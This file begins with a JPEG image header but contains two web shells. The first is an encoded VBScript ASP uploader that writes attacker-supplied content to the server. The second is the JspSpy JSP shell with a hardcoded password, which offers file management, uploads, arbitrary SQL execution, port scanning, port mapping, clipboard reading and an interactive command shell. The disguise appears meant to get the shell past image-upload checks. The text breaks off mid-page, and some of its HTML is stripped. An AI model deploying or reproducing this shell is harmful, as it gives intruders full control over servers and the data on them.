?? JFIF  ` ` ? C     $.' ",#(7),01444'9=82<.342? C  2!!22222222222222222222222222222222222222222222222222?  ? ," ?    ? ?  } !1AQa"q2?#B?R?3br? %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼?    ? ?  w !1AQaq"2?B憽绷 #3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬?   ? ?? (? (? (? (? (? (? (? (? (? (? (?? 暗组官方专用ASP小马 <%@ LANGUAGE = VBScript.Encode %> <%#@~^CgAAAA==[b:~K4N0/K3QMAAA==^#~@%> <%#@~^CQAAAA==[b:~6NmYlWgMAAA==^#~@%> <%#@~^EAAAAA==[b:~K4NmW!xDWk^+XgYAAA==^#~@%> <%#@~^FAAAAA==G PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> <%#@~^XwAAAA==dY~K4N0/KP{~/D-+MR^.lYG4N+mDcE?r_rm.JQEbwOJ3Ek oEQrR0EQrksJ3E/E3JH/J3JDn:r_EW(JQEN+mrQJDJ#ExwAAA==^#~@%> <%#@~^JwAAAA==r6POMks`D;!n/D`E/H0[2mYtrb#@!@*Jr~OtxigwAAA==^#~@%> <%#@~^GwAAAA==W9lOmP{PD;!n/D`EmH0[[mYlrbWwkAAA==^#~@%> <%#@~^QAAAAA==dY~K4NmW!xDWk^+xW(LWdKRmMnlD+YaO0bV`.+5;/O`rdX6N2CDtJbSDD;+*dRgAAA==^#~@%> <%#@~^GAAAAA==G(L^KE Y0bV hMkO+,0[CDlfQkAAA==^#~@%> <%#@~^DgAAAA==r6PnMD,'!,Y4nxlAQAAA==^#~@%> <%#@~^OQAAAA==./2Kxk+RSDbO+,J@!0KxO~1WVK.'M+N@*dC\PkE^mndk"@!z6GxD@*EXRMAAA==^#~@%> <%#@~^BAAAAA==n^/nqQEAAA==^#~@%> <%#@~^OwAAAA==./2Kxk+RSDbO+,J@!0KxO~1WVK.'M+N@*dC\P!xdE^^/d"@!&0KxO@*rQBQAAA==^#~@%> <%#@~^BgAAAA==n N~b0JgIAAA==^#~@%> <%#@~^CQAAAA==nMD 1VlDfgMAAA==^#~@%> <%#@~^BgAAAA==n N~b0JgIAAA==^#~@%> <%#@~^EgAAAA==G(L^KE Y0bV m^Wd+SAcAAA==^#~@%> <%#@~^GAAAAA==dY~K4NmW!xDWk^+xxKY4r opAkAAA==^#~@%> <%#@~^FAAAAA==dY~K4N0/KP{~xKY4k oYwcAAA==^#~@%> <%#@~^MQAAAA==./2Kxk+RSDbO+,J@!0KDh~mmYbGx{BBEv~:Y4W['2GkY@*JdRAAAA==^#~@%> <%#@~^SwAAAA==./2Kxk+RSDbO+,J保存文件的@!0KxO~1WVK.'M+N@*绝对路径c包括文件名l如N=-S+8-a m/2#=@!z6WUO@*JtxMAAA==^#~@%> <%#@~^QwAAAA==./2Kxk+RSDbO+,J@!k w;O,YXan'D+6D~Uls+{/z0[2mY4PSrNDtxfyP/r"'X!@*EehcAAA==^#~@%> <%#@~^FwAAAA==./2Kxk+RSDbO+,J@!4M@*EegcAAA==^#~@%> <%#@~^GAAAAA==./2Kxk+RSDbO+,J本文件绝对路径ELAYAAA==^#~@%> <%=#@~^NgAAAA==dD-Dc:lawmOtvDn;!+dOc/+M-+M\lMrC4^+k`E/^.bwO{ C:JbbshQAAA==^#~@%> <%#@~^FwAAAA==./2Kxk+RSDbO+,J@!4M@*EegcAAA==^#~@%> <%#@~^GAAAAA==./2Kxk+RSDbO+,J输入马的内容lJZgYAAA==^#~@%> <%#@~^UQAAAA==./2Kxk+RSDbO+,J@!Y6OCM+l,Uls+'1zWN9lDl~mGsk'0!,.WS/xqZPhr[Dtx&y@*@!zO6DlDl@*EKhsAAA==^#~@%> <%#@~^LwAAAA==./2Kxk+RSDbO+,J@!k w;O,YXan'kE4srOP7l^En'保存@*EAxAAAA==^#~@%> <%#@~^GgAAAA==./2Kxk+RSDbO+,J@!z6W.h@*JiQgAAA==^#~@%> <%@ page pageEncoding="utf-8"%> <%@ page import="java.io.*"%> <%@ page import="java.util.*"%> <%@ page import="java.util.regex.*"%> <%@ page import="java.sql.*"%> <%@ page import="java.lang.reflect.*"%> <%@ page import="java.nio.charset.*"%> <%@ page import="javax.servlet.http.HttpServletRequestWrapper"%> <%@ page import="java.text.*"%> <%@ page import="java.net.*"%> <%@ page import="java.util.zip.*"%> <%@ page import="java.util.jar.*"%> <%@ page import="java.awt.*"%> <%@ page import="java.awt.image.*"%> <%@ page import="javax.imageio.*"%> <%@ page import="java.awt.datatransfer.DataFlavor"%> <%@ page import="java.util.prefs.Preferences"%> <%! private static final String PW = "362412642"; //password private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; private static final String REQUEST_CHARSET = "ISO-8859-1"; private static final String PAGE_CHARSET = "UTF-8"; private static final String CURRENT_DIR = "currentdir"; private static final String MSG = "SHOWMSG"; private static final String PORT_MAP = "PMSA"; private static final String DBO = "DBO"; private static final String SHELL_ONLINE = "SHELL_ONLINE"; private static final String ENTER = "ENTER_FILE"; private static final String ENTER_MSG = "ENTER_FILE_MSG"; private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; private static final String SESSION_O = "SESSION_O"; private static String SHELL_NAME = ""; private static String WEB_ROOT = null; private static String SHELL_DIR = null; public static Map ins = new HashMap(); private static boolean ISLINUX = false; private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; private static final String BACK_HREF = " Back"; private static class MyRequest extends HttpServletRequestWrapper { public MyRequest(HttpServletRequest req) { super(req); } public String getParameter(String name) { try { String value = super.getParameter(name); if (name == null) return null; return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); } catch (Exception e) { return null; } } } private static class SpyClassLoader extends ClassLoader{ public SpyClassLoader() { } public Class defineClass(String name,byte[] b) { return super.defineClass(name,b,0,b.length - 2); } } private static class DBOperator{ private Connection conn = null; private Statement stmt = null; private String driver; private String url; private String uid; private String pwd; public DBOperator(String driver,String url,String uid,String pwd) throws Exception { this(driver,url,uid,pwd,false); } public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { Class.forName(driver); if (connect) this.conn = DriverManager.getConnection(url,uid,pwd); this.url = url; this.driver = driver; this.uid = uid; this.pwd = pwd; } public void connect() throws Exception{ this.conn = DriverManager.getConnection(url,uid,pwd); } public Object execute(String sql) throws Exception { if (isValid()) { stmt = conn.createStatement(); if (stmt.execute(sql)) { return stmt.getResultSet(); } else { return ""+stmt.getUpdateCount(); } } throw new Exception("Connection is inValid."); } public void closeStmt() throws Exception{ if (this.stmt != null) stmt.close(); } public boolean isValid() throws Exception { return conn != null && !conn.isClosed(); } public void close() throws Exception { if (isValid()) { closeStmt(); conn.close(); } } public boolean equals(Object o) { if (o instanceof DBOperator) { DBOperator dbo = (DBOperator)o; return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); } return false; } public Connection getConn(){ return this.conn; } } private static class StreamConnector extends Thread { private InputStream is; private OutputStream os; public StreamConnector( InputStream is, OutputStream os ){ this.is = is; this.os = os; } public void run(){ BufferedReader in = null; BufferedWriter out = null; try{ in = new BufferedReader( new InputStreamReader(this.is)); out = new BufferedWriter( new OutputStreamWriter(this.os)); char buffer[] = new char[8192]; int length; while((length = in.read( buffer, 0, buffer.length ))>0){ out.write( buffer, 0, length ); out.flush(); } } catch(Exception e){} try{ if(in != null) in.close(); if(out != null) out.close(); } catch( Exception e ){} } public static void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ new Thread(new Runnable(){ public void run(){ while (true) { try{ byte[] data = new byte[100]; int len = localIn.read(data); while (len != -1) { remoteOut.write(data,0,len); len = localIn.read(data); } }catch (Exception e) { break; } } } }).start(); } public static void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ new Thread(new Runnable(){ public void run(){ while(true) { try{ byte[] data = new byte[100]; int len = remoteIn.read(data); while (len != -1) { localOut.write(data,0,len); len = remoteIn.read(data); } }catch (Exception e) { try{ soc.close(); remoteSoc.close(); }catch(Exception ex) { } break; } } } }).start(); } } private static class EnterFile extends File{ private ZipFile zf = null; private ZipEntry entry = null; private boolean isDirectory = false; private String absolutePath = null; public void setEntry(ZipEntry e) { this.entry = e; } public void setAbsolutePath(String p) { this.absolutePath = p; } public void close() throws Exception{ this.zf.close(); } public void setZf(String p) throws Exception{ if (p.toLowerCase().endsWith(".jar")) this.zf = new JarFile(p); else this.zf = new ZipFile(p); } public EnterFile(File parent, String child) { super(parent,child); } public EnterFile(String pathname) { super(pathname); } public EnterFile(String pathname,boolean isDir) { this(pathname); this.isDirectory = isDir; } public EnterFile(String parent, String child) { super(parent,child); } public EnterFile(URI uri) { super(uri); } public boolean exists(){ return new File(this.zf.getName()).exists(); } public File[] listFiles() { java.util.List list = new ArrayList(); java.util.List handled = new ArrayList(); String currentDir = super.getPath(); currentDir = currentDir.replace('\\','/'); if (currentDir.indexOf("/") == 0) { if (currentDir.length() > 1) currentDir = currentDir.substring(1); else currentDir = ""; } Enumeration e = this.zf.entries(); while (e.hasMoreElements()) { ZipEntry entry = (ZipEntry)e.nextElement(); String eName = entry.getName(); if (this.zf instanceof JarFile) { if (!entry.isDirectory()){ EnterFile ef = new EnterFile(eName); ef.setEntry(entry); try{ ef.setZf(this.zf.getName()); }catch(Exception ex) { } list.add(ef); } } else { if (currentDir.equals("")) { //zip root directory if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$")) { EnterFile ef = new EnterFile(eName.replaceAll("/","")); handled.add(eName.replaceAll("/","")); ef.setEntry(entry); list.add(ef); } else { if (eName.indexOf("/") != -1) { String tmp = eName.substring(0,eName.indexOf("/")); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { EnterFile ef = new EnterFile(tmp,true); ef.setEntry(entry); list.add(ef); handled.add(tmp); } } } } else { if (eName.startsWith(currentDir)) { if (eName.matches(currentDir+"/[^/]+/?$")) { //file. EnterFile ef = new EnterFile(eName); ef.setEntry(entry); list.add(ef); if (eName.endsWith("/")) { String tmp = eName.substring(eName.lastIndexOf('/',eName.length()-2)); tmp = tmp.substring(1,tmp.length()-1); handled.add(tmp); } } else { //dir try { String tmp = eName.substring(currentDir.length()+1); tmp = tmp.substring(0,tmp.indexOf('/')); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { EnterFile ef = new EnterFile(tmp,true); ef.setAbsolutePath(currentDir+"/"+tmp); ef.setEntry(entry); list.add(ef); handled.add(tmp); } } catch (Exception ex) { } } } } } } return (File[])list.toArray(new File[0]); } public boolean isDirectory(){ return this.entry.isDirectory() || this.isDirectory; } public String getParent(){ return ""; } public String getAbsolutePath(){ return absolutePath != null ? absolutePath : super.getPath(); } public String getName(){ if (this.zf instanceof JarFile) { return this.getAbsolutePath(); } else { return super.getName(); } } public long lastModified(){ return entry.getTime(); } public boolean canRead(){ return false; } public boolean canWrite(){ return false; } public boolean canExecute(){ return false; } public long length(){ return entry.getSize(); } } private static class OnLineProcess { private String cmd = "first"; private Process pro; public OnLineProcess(Process p){ this.pro = p; } public void setPro(Process p) { this.pro = p; } public void setCmd(String c){ this.cmd = c; } public String getCmd(){ return this.cmd; } public Process getPro(){ return this.pro; } public void stop(){ this.pro.destroy(); } } private static class OnLineConnector extends Thread { private OnLineProcess ol = null; private InputStream is; private OutputStream os; private String name; public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ this.is = is; this.os = os; this.name = name; this.ol = ol; } public void run(){ BufferedReader in = null; BufferedWriter out = null; try{ in = new BufferedReader( new InputStreamReader(this.is)); out = new BufferedWriter( new OutputStreamWriter(this.os)); char buffer[] = new char[128]; if(this.name.equals("exeRclientO")) { //from exe to client int length = 0; while((length = in.read( buffer, 0, buffer.length ))>0){ String str = new String(buffer, 0, length); str = str.replaceAll("&","&").replaceAll("<","<").replaceAll(">",">"); str = str.replaceAll(""+(char)13+(char)10,"
"); str = str.replaceAll("\n","
"); out.write(str.toCharArray(), 0, str.length()); out.flush(); } } else { //from client to exe while(true) { while(this.ol.getCmd() == null) { Thread.sleep(500); } if (this.ol.getCmd().equals("first")) { this.ol.setCmd(null); continue; } this.ol.setCmd(this.ol.getCmd() + (char)10); char[] arr = this.ol.getCmd().toCharArray(); out.write(arr,0,arr.length); out.flush(); this.ol.setCmd(null); } } } catch(Exception e){ } try{ if(in != null) in.close(); if(out != null) out.close(); } catch( Exception e ){ } } } private static class Table{ private ArrayList rows = null; private boolean echoTableTag = false; public void setEchoTableTag(boolean v) { this.echoTableTag = v; } public Table(){ this.rows = new ArrayList(); } public void addRow(Row r) { this.rows.add(r); } public String toString(){ StringBuffer html = new StringBuffer(); if (echoTableTag) html.append(""); for (int i = 0;i"); ArrayList columns = r.getColumns(); for (int a = 0;a"); String vv = Util.htmlEncode(Util.getStr(c.getValue())); if (vv.equals("")) vv = " "; html.append(vv); html.append(""); } html.append(""); } if (echoTableTag) html.append("
"); return html.toString(); } public static String rs2Table(ResultSet rs,String sep,boolean op) throws Exception{ StringBuffer table = new StringBuffer(); ResultSetMetaData meta = rs.getMetaData(); int count = meta.getColumnCount(); if (!op) table.append(" View Struct - View All Tables

"); else table.append(" All Tables

"); table.append(" "); table.append(""); for (int i = 1;i<=count;i++) { table.append(""); } if (op) table.append(""); table.append(""); while (rs.next()) { String tbName = null; table.append(""); for (int i = 1;i<=count;i++) { String v = rs.getString(i); if (i == 3) tbName = v; table.append(""); } if (op) table.append(""); table.append(""); } table.append("
"+meta.getColumnName(i)+" 
"+Util.null2Nbsp(v)+" View | Struct | Export | Save To File

"); return table.toString(); } } private static class Row{ private ArrayList cols = null; public Row(){ this.cols = new ArrayList(); } public void addColumn(Column n) { this.cols.add(n); } public ArrayList getColumns(){ return this.cols; } } private static class Column{ private String value; public Column(String v){ this.value = v; } public String getValue(){ return this.value; } } private static class Util{ public static boolean isEmpty(String s) { return s == null || s.trim().equals(""); } public static boolean isEmpty(Object o) { return o == null || isEmpty(o.toString()); } public static String getSize(long size,char danwei) { if (danwei == 'M') { double v = formatNumber(size / 1024.0 / 1024.0,2); if (v > 1024) { return getSize(size,'G'); }else { return v + "M"; } } else if (danwei == 'G') { return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; } else if (danwei == 'K') { double v = formatNumber(size / 1024.0,2); if (v > 1024) { return getSize(size,'M'); } else { return v + "K"; } } else if (danwei == 'B') { if (size > 1024) { return getSize(size,'K'); }else { return size + "B"; } } return ""+0+danwei; } public static boolean exists(String[] arr,String v) { for (int i =0;i",">"); } public static String getStr(String s) { return s == null ? "" :s; } public static String null2Nbsp(String s) { if (s == null) s = " "; return s; } public static String getStr(Object s) { return s == null ? "" :s.toString(); } public static String exec(String regex, String str, int group) { Pattern pat = Pattern.compile(regex); Matcher m = pat.matcher(str); if (m.find()) return m.group(group); return null; } public static void outMsg(Writer out,String msg) throws Exception { outMsg(out,msg,"center"); } public static void outMsg(Writer out,String msg,String align) throws Exception { out.write("
"+msg+"
"); } public static String highLight(String str) { str = str.replaceAll("\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b","$1"); str = str.replaceAll("\t(//.+)","\t$1"); return str; } } private static class UploadBean { private String fileName = null; private String suffix = null; private String savePath = ""; private ServletInputStream sis = null; private OutputStream targetOutput = null; private byte[] b = new byte[1024]; public void setTargetOutput(OutputStream stream) { this.targetOutput = stream; } public UploadBean() { } public void setSavePath(String path) { this.savePath = path; } public String getFileName(){ return this.fileName; } public void parseRequest(HttpServletRequest request) throws IOException { sis = request.getInputStream(); int a = 0; int k = 0; String s = ""; while ((a = sis.readLine(b,0,b.length))!= -1) { s = new String(b, 0, a,PAGE_CHARSET); if ((k = s.indexOf("filename=\""))!= -1) { s = s.substring(k + 10); k = s.indexOf("\""); s = s.substring(0, k); File tF = new File(s); if (tF.isAbsolute()) { fileName = tF.getName(); } else { fileName = s; } k = s.lastIndexOf("."); suffix = s.substring(k + 1); upload(); } } } private void upload() throws IOException{ try { OutputStream out = null; if (this.targetOutput != null) out = this.targetOutput; else out = new FileOutputStream(new File(savePath,fileName)); int a = 0; int k = 0; String s = ""; while ((a = sis.readLine(b,0,b.length))!=-1) { s = new String(b, 0, a); if ((k = s.indexOf("Content-Type:"))!=-1) { break; } } sis.readLine(b,0,b.length); while ((a = sis.readLine(b,0,b.length)) != -1) { s = new String(b, 0, a); if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { break; } out.write(b, 0, a); } if (out instanceof FileOutputStream) out.close(); } catch (IOException ioe) { throw ioe; } } } %> <% SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); String myAbsolutePath = application.getRealPath(request.getServletPath()); if (Util.isEmpty(myAbsolutePath)) {//for weblogic SHELL_NAME = request.getServletPath(); myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); SHELL_NAME=request.getContextPath()+SHELL_NAME; WEB_ROOT = new File(application.getResource("/").getPath()).toString(); } else { WEB_ROOT = application.getRealPath("/"); } SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); if (SHELL_DIR.indexOf('/') == 0) ISLINUX = true; else ISLINUX = false; if (session.getAttribute(CURRENT_DIR) == null) session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { String o = request.getParameter("o"); if (o != null && o.equals("login")) { ((Invoker)ins.get("login")).invoke(request,response,session); return; } else if (o != null && o.equals("vLogin")) { ((Invoker)ins.get("vLogin")).invoke(request,response,session); return; } else { ((Invoker)ins.get("vLogin")).invoke(request,response,session); return; } } %> <%! private static interface Invoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; public boolean doBefore(); public boolean doAfter(); } private static class DefaultInvoker implements Invoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { } public boolean doBefore(){ return true; } public boolean doAfter() { return true; } } private static class ScriptInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(" "); } catch (Exception e) { throw e ; } } } private static class BeforeInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("JspSpy Private Codz By - Ninty"); } catch (Exception e) { throw e ; } } } private static class AfterInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(""); } catch (Exception e) { throw e ; } } } private static class DeleteBatchInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String files = request.getParameter("files"); int success = 0; int failed = 0; if (!Util.isEmpty(files)) { String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); String[] arr = files.split(","); for (int i = 0;iSuccess , "+failed+" Files Deleted Failed!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } private static class ClipBoardInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(""+ " "+ " "+ " "+ "
"+ "

System Clipboard »

"+ "

");
try{
out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getContents(DataFlavor.stringFlavor).getTransferData(DataFlavor.stringFlavor))));
}catch (Exception ex) {
out.println("ClipBoard is Empty Or Is Not Text Data !");
}
out.println("
"+ " "+ "

"+ "
"); } catch (Exception e) { throw e ; } } } private static class VPortScanInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String ip = request.getParameter("ip"); String ports = request.getParameter("ports"); String timeout = request.getParameter("timeout"); String banner = request.getParameter("banner"); if (Util.isEmpty(ip)) ip = "127.0.0.1"; if (Util.isEmpty(ports)) ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; if (Util.isEmpty(timeout)) timeout = "2"; out.println("
"+ "

PortScan >>

"+ "
"+ "

"+ "IP : Port : Banner Timeout (Second) : "+ "

"+ "
"+ "
"); } catch (Exception e) { throw e ; } } } private static class PortScanInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); ((Invoker)ins.get("vPortScan")).invoke(request,response,JSession); out.println("
"); String ip = request.getParameter("ip"); String ports = request.getParameter("ports"); String timeout = request.getParameter("timeout"); String banner = request.getParameter("banner"); int iTimeout = 0; if (Util.isEmpty(ip) || Util.isEmpty(ports)) return; if (!Util.isInteger(timeout)) { timeout = "2"; } iTimeout = Integer.parseInt(timeout); Map rs = new LinkedHashMap(); String[] portArr = ports.split(","); for (int i =0;i"+sb.toString()+""); r.close(); } else { rs.put(port,"Open"); } s.close(); } catch (Exception e) { if (e.toString().toLowerCase().indexOf("read timed out")!=-1) { rs.put(port,"Open <<No Banner!>>"); if (r != null) r.close(); } else { rs.put(port,"Close"); } } } out.println("
"); Set entrySet = rs.entrySet(); Iterator it = entrySet.iterator(); while (it.hasNext()) { Map.Entry e = (Map.Entry)it.next(); String port = (String)e.getKey(); String value = (String)e.getValue(); out.println(ip+" : "+port+" ................................. "+value+"
"); } out.println("
"); } catch (Exception e) { throw e ; } } } private static class VConnInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); Object obj = JSession.getAttribute(DBO); if (obj == null || !((DBOperator)obj).isValid()) { out.println(" "); out.println("
"+ "
"+ ""+ "

DataBase Manager »

"+ ""+ "

"+ "Driver:"+ " "+ "URL:"+ ""+ "UID:"+ ""+ "PWD:"+ ""+ "DataBase:"+ " "+ ""+ "

"+ "
"); } else { ((Invoker)ins.get("dbc")).invoke(request,response,JSession); } } catch (ClassCastException e) { throw e; } catch (Exception e) { throw e ; } } } //DBConnect private static class DbcInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String driver = request.getParameter("driver"); String url = request.getParameter("url"); String uid = request.getParameter("uid"); String pwd = request.getParameter("pwd"); String sql = request.getParameter("sql"); String selectDb = request.getParameter("selectDb"); if (selectDb == null) selectDb = JSession.getAttribute("selectDb").toString(); else JSession.setAttribute("selectDb",selectDb); Object dbo = JSession.getAttribute(DBO); if (dbo == null || !((DBOperator)dbo).isValid()) { if (dbo != null) ((DBOperator)dbo).close(); dbo = new DBOperator(driver,url,uid,pwd,true); } else { if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { DBOperator oldDbo = (DBOperator)dbo; dbo = new DBOperator(driver,url,uid,pwd); if (!oldDbo.equals(dbo)) { ((DBOperator)oldDbo).close(); ((DBOperator)dbo).connect(); } else { dbo = oldDbo; } } } DBOperator Ddbo = (DBOperator)dbo; JSession.setAttribute(DBO,Ddbo); if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) { Ddbo.getConn().setCatalog(request.getParameter("catalog")); } Util.outMsg(out,"Connect To DataBase Success!"); out.println(" "); out.println("
"+ "
"+ ""+ "

DataBase Manager »

"+ ""+ "

"+ "Driver:"+ " "+ "URL:"+ ""+ "UID:"+ ""+ "PWD:"+ ""+ "DataBase:"+ " "+ ""+ "

"+ "
"); DatabaseMetaData meta = Ddbo.getConn().getMetaData(); out.println("
"+ "

Version : "+meta.getDatabaseProductName()+" , "+meta.getDatabaseProductVersion()+"
URL : "+meta.getURL()+"
Catalog : "+Ddbo.getConn().getCatalog()+"
UserName : "+meta.getUserName()+"

Run SQL query/queries on database / Switch Database : "); out.println("

"); if (Util.isEmpty(sql)) { String type = request.getParameter("type"); if (Util.isEmpty(type) || type.equals("switch")) { ResultSet tbs = meta.getTables(null,null,null,null); out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true)); tbs.close(); } else if (type.equals("struct")) { String tb = request.getParameter("table"); if (Util.isEmpty(tb)) return; ResultSet t = meta.getColumns(null,null,tb,null); out.println(Table.rs2Table(t,"",false)); t.close(); } } } catch (Exception e) { JSession.setAttribute(MSG,"Some Error Occurred. Please Check Out the StackTrace Follow."+BACK_HREF); throw e; } } } private static class ExecuteSQLInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String sql = request.getParameter("sql"); String db = request.getParameter("selectDb"); Object dbo = JSession.getAttribute(DBO); if (!Util.isEmpty(sql)) { if (dbo == null || !((DBOperator)dbo).isValid()) { ((Invoker)ins.get("vConn")).invoke(request,response,JSession); return; } else { ((Invoker)ins.get("dbc")).invoke(request,response,JSession); Object obj = ((DBOperator)dbo).execute(sql); if (obj instanceof ResultSet) { ResultSet rs = (ResultSet)obj; ResultSetMetaData meta = rs.getMetaData(); int colCount = meta.getColumnCount(); out.println("Query#0 : "+Util.htmlEncode(sql)+"

"); out.println(""); for (int i=1;i<=colCount;i++) { out.println(""); } out.println(""); Table tb = new Table(); while(rs.next()) { Row r = new Row(); for (int i = 1;i<=colCount;i++) { String v = null; try { v = rs.getString(i); } catch (SQLException ex) { v = "<>"; } r.addColumn(new Column(v)); } tb.addRow(r); } out.println(tb.toString()); out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"

"); rs.close(); ((DBOperator)dbo).closeStmt(); } else { out.println("affected rows : "+obj+"

"); } } } else { ((Invoker)ins.get("dbc")).invoke(request,response,JSession); } } catch (Exception e) { throw e ; } } } private static class VLoginInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("jspspy
"+ " "+ "

Password: "+ " "+ " "+ " "+ "
"+ "

"+ "
CY... I Love You. I Do! by n1nty 2010/8/18"); } catch (Exception e) { throw e ; } } } private static class LoginInvoker extends DefaultInvoker{ public boolean doBefore() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String inputPw = request.getParameter("pw"); if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); return; } else { JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); response.sendRedirect(SHELL_NAME); return; } } catch (Exception e) { throw e ; } } } private static class MyComparator implements Comparator{ public int compare(Object obj1,Object obj2) { try { if (obj1 != null && obj2 != null) { File f1 = (File)obj1; File f2 = (File)obj2; if (f1.isDirectory()) { if (f2.isDirectory()) { return f1.getName().compareTo(f2.getName()); } else { return -1; } } else { if (f2.isDirectory()) { return 1; } else { return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase()); } } } return 0; } catch (Exception e) { return 0; } } } private static class FileListInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { try { String path2View = null; PrintWriter out = response.getWriter(); String path = request.getParameter("folder"); String outEntry = request.getParameter("outentry"); if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { JSession.removeAttribute(ENTER); JSession.removeAttribute(ENTER_MSG); JSession.removeAttribute(ENTER_CURRENT_DIR); } Object enter = JSession.getAttribute(ENTER); File file = null; if (!Util.isEmpty(enter)) { if (Util.isEmpty(path)) { if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) path = "/"; else path = (String)(JSession.getAttribute(ENTER_CURRENT_DIR)); } file = new EnterFile(path); ((EnterFile)file).setZf((String)enter); JSession.setAttribute(ENTER_CURRENT_DIR,path); } else { if (Util.isEmpty(path)) path = JSession.getAttribute(CURRENT_DIR).toString(); JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); file = new File(path); } path2View = Util.convertPath(path); if (!file.exists()) { throw new Exception(path+"Dont Exists !"); } File[] list = file.listFiles(); Arrays.sort(list,new MyComparator()); out.println("
"); String cr = null; try { cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); }catch(Exception e) { cr = "/"; } File currentRoot = new File(cr); out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

"); out.println("
"+ ""+ " "+ " "+ " "+ " "+ " "+ "
Current Directory
"+ "
"); out.println(""+ ""+ ""+ ""+ " "+ " "+ " "+ " "+ " "+ ""); if (file.getParent() != null) { out.println(""+ ""+ ""+ ""); } int dircount = 0; int filecount = 0; for (int i = 0;i"+ ""+ ""+ ""+ ""+ ""+ ""); } else { filecount++; out.println(""+ ""+ ""+ ""+ ""+ ""+ ""); } } out.println(""+ " "+ " "+ "
"+ "
"+ "Web Root"+ " | Shell Directory"+ " | New Directory | New File"+ " | "); File[] roots = file.listRoots(); for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); if (i != roots.length -1) { out.println("|"); } } out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
